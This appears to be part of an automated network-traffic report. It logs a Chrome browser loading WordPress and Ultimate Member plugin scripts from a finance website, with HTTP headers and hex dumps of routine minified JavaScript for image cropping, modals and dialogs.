                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 31 29 3c 68 3f 28 72 3d 61 2e 77 69 64 74 68 2d 6e 2e 77 69 64 74 68 2c 74 3d 61 2e 68 65 69 67 68 74 2d 6e 2e 68 65 69 67 68 74 2c 6e 2e 6d 69 6e 4c 65 66 74 3d 4d 61 74 68 2e 6d 69 6e 28 30 2c 72 29 2c 6e 2e 6d 69 6e 54 6f 70 3d 4d 61 74 68 2e 6d 69 6e 28 30 2c 74 29 2c 6e 2e 6d 61 78 4c 65 66 74 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 29 2c 6e 2e 6d 61 78 54 6f 70 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 74 29 2c 73 26 26 74 68 69 73 2e 6c 69 6d 69 74 65 64 26 26 28 6e 2e 6d 69 6e 4c 65 66 74 3d 4d 61 74 68 2e 6d 69 6e 28 6f 2e 6c 65 66 74 2c 6f 2e 6c 65 66 74 2b 28 6f 2e 77 69 64 74 68 2d 6e 2e 77 69 64 74 68 29 29 2c 6e 2e 6d 69 6e 54 6f 70 3d 4d 61 74 68 2e 6d 69 6e 28 6f 2e 74 6f 70 2c 6f 2e 74 6f 70 2b 28 6f 2e 68 65 69 67 68 74 2d 6e 2e 68 65 69 67 68
                                                                                                                                                                                                                                                                        Data Ascii: 1)<h?(r=a.width-n.width,t=a.height-n.height,n.minLeft=Math.min(0,r),n.minTop=Math.min(0,t),n.maxLeft=Math.max(0,r),n.maxTop=Math.max(0,t),s&&this.limited&&(n.minLeft=Math.min(o.left,o.left+(o.width-n.width)),n.minTop=Math.min(o.top,o.top+(o.height-n.heigh
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6d 69 74 43 61 6e 76 61 73 28 21 31 2c 21 30 29 2c 68 2e 6c 65 66 74 3d 4d 61 74 68 2e 6d 69 6e 28 4d 61 74 68 2e 6d 61 78 28 68 2e 6c 65 66 74 2c 68 2e 6d 69 6e 4c 65 66 74 29 2c 68 2e 6d 61 78 4c 65 66 74 29 2c 68 2e 74 6f 70 3d 4d 61 74 68 2e 6d 69 6e 28 4d 61 74 68 2e 6d 61 78 28 68 2e 74 6f 70 2c 68 2e 6d 69 6e 54 6f 70 29 2c 68 2e 6d 61 78 54 6f 70 29 2c 68 2e 6f 6c 64 4c 65 66 74 3d 68 2e 6c 65 66 74 2c 68 2e 6f 6c 64 54 6f 70 3d 68 2e 74 6f 70 2c 66 28 74 68 69 73 2e 63 61 6e 76 61 73 2c 67 28 7b 77 69 64 74 68 3a 68 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 68 2e 68 65 69 67 68 74 7d 2c 78 28 7b 74 72 61 6e 73 6c 61 74 65 58 3a 68 2e 6c 65 66 74 2c 74 72 61 6e 73 6c 61 74 65 59 3a 68 2e 74 6f 70 7d 29 29 29 2c 74 68 69 73 2e 72 65 6e 64 65 72 49
                                                                                                                                                                                                                                                                        Data Ascii: mitCanvas(!1,!0),h.left=Math.min(Math.max(h.left,h.minLeft),h.maxLeft),h.top=Math.min(Math.max(h.top,h.minTop),h.maxTop),h.oldLeft=h.left,h.oldTop=h.top,f(this.canvas,g({width:h.width,height:h.height},x({translateX:h.left,translateY:h.top}))),this.renderI


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        57192.168.2.449813141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC800OUTGET /wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-6e4"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147809
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e9ef2c4219-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC878INData Raw: 36 65 34 0d 0a 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 55 4d 26 26 28 77 69 6e 64 6f 77 2e 55 4d 3d 7b 7d 29 2c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 55 4d 2e 66 72 6f 6e 74 65 6e 64 26 26 28 55 4d 2e 66 72 6f 6e 74 65 6e 64 3d 7b 7d 29 2c 55 4d 2e 66 72 6f 6e 74 65 6e 64 3d 7b 63 72 6f 70 70 65 72 3a 7b 6f 62 6a 3a 6e 75 6c 6c 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 20 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 20 69 6d 67 22 29 2e 66 69 72 73 74 28 29 3b 69 66 28 6f 2e 6c 65 6e 67 74 68 26 26 22 22 21 3d 3d 6f 2e 61 74 74 72 28 22 73 72 63 22 29 29 7b 55 4d 2e 66 72 6f 6e 74 65 6e 64 2e 63 72 6f 70 70
                                                                                                                                                                                                                                                                        Data Ascii: 6e4"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.frontend&&(UM.frontend={}),UM.frontend={cropper:{obj:null,init:function(){var o=jQuery(".um-modal .um-single-image-preview img").first();if(o.length&&""!==o.attr("src")){UM.frontend.cropp
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC893INData Raw: 78 2d 68 65 69 67 68 74 22 3a 64 2b 22 70 78 22 7d 29 29 3b 6c 65 74 20 65 3b 22 73 71 75 61 72 65 22 3d 3d 3d 72 3f 65 3d 7b 6d 69 6e 57 69 64 74 68 3a 6e 2c 6d 69 6e 48 65 69 67 68 74 3a 69 2c 64 72 61 67 43 72 6f 70 3a 21 31 2c 61 73 70 65 63 74 52 61 74 69 6f 3a 31 2c 7a 6f 6f 6d 61 62 6c 65 3a 21 31 2c 72 6f 74 61 74 61 62 6c 65 3a 21 31 2c 64 61 73 68 65 64 3a 21 31 7d 3a 22 63 6f 76 65 72 22 3d 3d 3d 72 3f 28 30 3c 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 2f 61 29 26 26 28 69 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 2f 61 29 29 2c 65 3d 7b 6d 69 6e 57 69 64 74 68 3a 6e 2c 6d 69 6e 48 65 69 67 68 74 3a 69 2c 64 72 61 67 43 72 6f 70 3a 21 31 2c 61 73 70 65 63 74 52 61 74 69 6f 3a 61 2c 7a 6f 6f 6d 61 62 6c 65 3a 21 31 2c 72 6f 74 61 74 61 62 6c 65 3a 21 31
                                                                                                                                                                                                                                                                        Data Ascii: x-height":d+"px"}));let e;"square"===r?e={minWidth:n,minHeight:i,dragCrop:!1,aspectRatio:1,zoomable:!1,rotatable:!1,dashed:!1}:"cover"===r?(0<Math.round(n/a)&&(i=Math.round(n/a)),e={minWidth:n,minHeight:i,dragCrop:!1,aspectRatio:a,zoomable:!1,rotatable:!1
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        58192.168.2.449814141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC793OUTGET /wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-101c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147809
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9eb699043ab-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC877INData Raw: 31 30 31 63 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 5f 4d 6f 64 61 6c 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 27 2e 75 6d 2d 6d 6f 64 61 6c 2d 6f 76 65 72 6c 61 79 2c 20 61 5b 64 61 74 61 2d 61 63 74 69 6f 6e 3d 22 75 6d 5f 72 65 6d 6f 76 65 5f 6d 6f 64 61 6c 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 75 6d 5f 72 65 6d 6f 76 65 5f 6d 6f 64 61 6c 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b
                                                                                                                                                                                                                                                                        Data Ascii: 101cjQuery(document).ready(function(){jQuery(document).on("click",".um-popup-overlay",function(){remove_Modal()}),jQuery(document).on("click",'.um-modal-overlay, a[data-action="um_remove_modal"]',function(){um_remove_modal()}),jQuery(document).on("click
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 22 29 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 2d 70 72 65 76 69 65 77 5b 64 61 74 61 2d 6b 65 79 3d 22 2b 65 2b 22 5d 22 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 22 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 27 29 2e 76 61 6c 28 61 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 66 69 6e 69 73 68 2d 75 70 6c 6f 61 64 2e 69 6d 61 67 65 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 65 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 69 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6b 65 79 22 29 2c 72 3d 6a 51 75 65 72
                                                                                                                                                                                                                                                                        Data Ascii: ")),jQuery(".um-single-file-preview[data-key="+e+"]").parents(".um-field").find('input[type="hidden"]').val(a)}),jQuery(document).on("click",".um-finish-upload.image:not(.disabled)",function(){var a,e,t=jQuery(this),i=jQuery(this).attr("data-key"),r=jQuer
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 65 2e 73 6f 75 72 63 65 5f 75 72 6c 2b 22 3f 22 2b 61 2e 67 65 74 54 69 6d 65 28 29 2b 27 22 20 61 6c 74 3d 22 22 20 2f 3e 27 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 22 29 2e 68 61 73 43 6c 61 73 73 28 22 75 6d 2d 65 64 69 74 69 6e 67 22 29 29 26 26 6a 51 75 65 72 79 28 22 2e 75 6d 2d 63 6f 76 65 72 2d 6f 76 65 72 6c 61 79 22 29 2e 73 68 6f 77 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 5b 64 61 74 61 2d 6b 65 79 3d 22 2b 69 2b 22 5d 22 29 2e 66 61 64 65 49 6e 28 29 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 61 74 74 72 28 22 73 72 63 22 2c 65 2e 64 61 74 61 2e 69 6d 61 67 65 2e 73 6f 75 72 63 65 5f 75 72 6c 2b 22 3f 22 2b 61 2e 67 65 74 54 69 6d 65 28 29 29 2c 75 6d 5f 72 65 6d 6f 76 65 5f 6d 6f 64
                                                                                                                                                                                                                                                                        Data Ascii: e.source_url+"?"+a.getTime()+'" alt="" />'),jQuery(".um").hasClass("um-editing"))&&jQuery(".um-cover-overlay").show(),jQuery(".um-single-image-preview[data-key="+i+"]").fadeIn().find("img").attr("src",e.data.image.source_url+"?"+a.getTime()),um_remove_mod
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC517INData Raw: 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 75 73 65 72 5f 69 64 22 29 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 63 6f 76 65 72 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 72 61 74 69 6f 22 29 26 26 6a 51 75 65 72 79 28 22 23 22 2b 61 29 2e 61 74 74 72 28 22 64 61 74 61 2d 72 61 74 69 6f 22 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 63 6f 76 65 72 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 72 61 74 69 6f 22 29 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 63 6f 76 65 72 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 75 73 65 72 5f 69 64 22 29
                                                                                                                                                                                                                                                                        Data Ascii: ery(this).parents(".um-profile-photo").attr("data-user_id")),jQuery(this).parents(".um-cover").attr("data-ratio")&&jQuery("#"+a).attr("data-ratio",jQuery(this).parents(".um-cover").attr("data-ratio")),jQuery(this).parents(".um-cover").attr("data-user_id")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        59192.168.2.449815141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC575OUTGET /wp-includes/js/wp-util.min.js?ver=d4c9c51d21a0c26e910ec9a6a2b06883 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-592"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147809
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ebab8f728c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC878INData Raw: 35 39 32 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 3f 7b 7d 3a 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 3b 77 70 2e 74 65 6d 70 6c 61 74 65 3d 5f 2e 6d 65 6d 6f 69 7a 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 61 3d 7b 65 76 61 6c 75 61 74 65 3a 2f 3c 23 28 5b 5c 73 5c 53 5d 2b 3f 29 23 3e 2f 67 2c 69 6e 74 65 72 70 6f 6c 61 74 65 3a 2f 5c 7b 5c 7b 5c 7b 28 5b 5c 73 5c 53 5d 2b 3f 29 5c 7d 5c 7d 5c 7d 2f 67 2c 65 73 63 61 70 65 3a 2f 5c 7b
                                                                                                                                                                                                                                                                        Data Ascii: 592/*! This file is auto-generated */window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC555INData Raw: 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 22 31 22 21 3d 3d 74 26 26 31 21 3d 3d 74 7c 7c 28 74 3d 7b 73 75 63 63 65 73 73 3a 21 30 7d 29 2c 5f 2e 69 73 4f 62 6a 65 63 74 28 74 29 26 26 21 5f 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 2e 73 75 63 63 65 73 73 29 3f 28 65 3d 74 68 69 73 2c 6e 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 61 2e 64 61 74 61 26 26 22 71 75 65 72 79 2d 61 74 74 61 63 68 6d 65 6e 74 73 22 3d 3d 3d 61 2e 64 61 74 61 2e 61 63 74 69 6f 6e 26 26 6e 2e 6a 71 58 48 52 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 22 29 26 26 6e 2e 6a 71 58 48 52 2e 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 28 22 58 2d 57 50 2d 54 6f 74 61 6c 22
                                                                                                                                                                                                                                                                        Data Ascii: .done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&a.data&&"query-attachments"===a.data.action&&n.jqXHR.hasOwnProperty("getResponseHeader")&&n.jqXHR.getResponseHeader("X-WP-Total"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        60192.168.2.449816141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC592OUTGET /wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.js?ver=1.0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-a6e"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147809
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ebaa521902-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC878INData Raw: 61 36 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 2c 6e 3d 7b 6d 65 73 73 61 67 65 3a 22 22 2c 79 65 73 5f 6c 61 62 65 6c 3a 22 59 65 73 22 2c 6e 6f 5f 6c 61 62 65 6c 3a 22 4e 6f 22 7d 2c 6d 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 3d 74 2e 65 78 74 65 6e 64 28 7b 7d 2c 6e 2c 6f 29 2c 74 28 74 68 69 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 74 68 69 73 29 2e 64 61 74 61 28 22 6f 70 74 69 6f 6e 73 22 2c 69 29 2c 6d 2e 62 75 69 6c 64 2e 61 70 70 6c 79 28 74 28 74 68 69 73 29 2c 5b 69 5d 29 2c 74 28 74 68 69 73 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2e 64 61 74 61 28 22 6f 70 74 69 6f 6e 73 22 29 3b 74 28 22 23 75 6d 5f 63 6f 6e 66 69 72 6d
                                                                                                                                                                                                                                                                        Data Ascii: a6e!function(t){var i,n={message:"",yes_label:"Yes",no_label:"No"},m={init:function(o){i=t.extend({},n,o),t(this).each(function(){t(this).data("options",i),m.build.apply(t(this),[i]),t(this).click(function(o){var i=t(this).data("options");t("#um_confirm
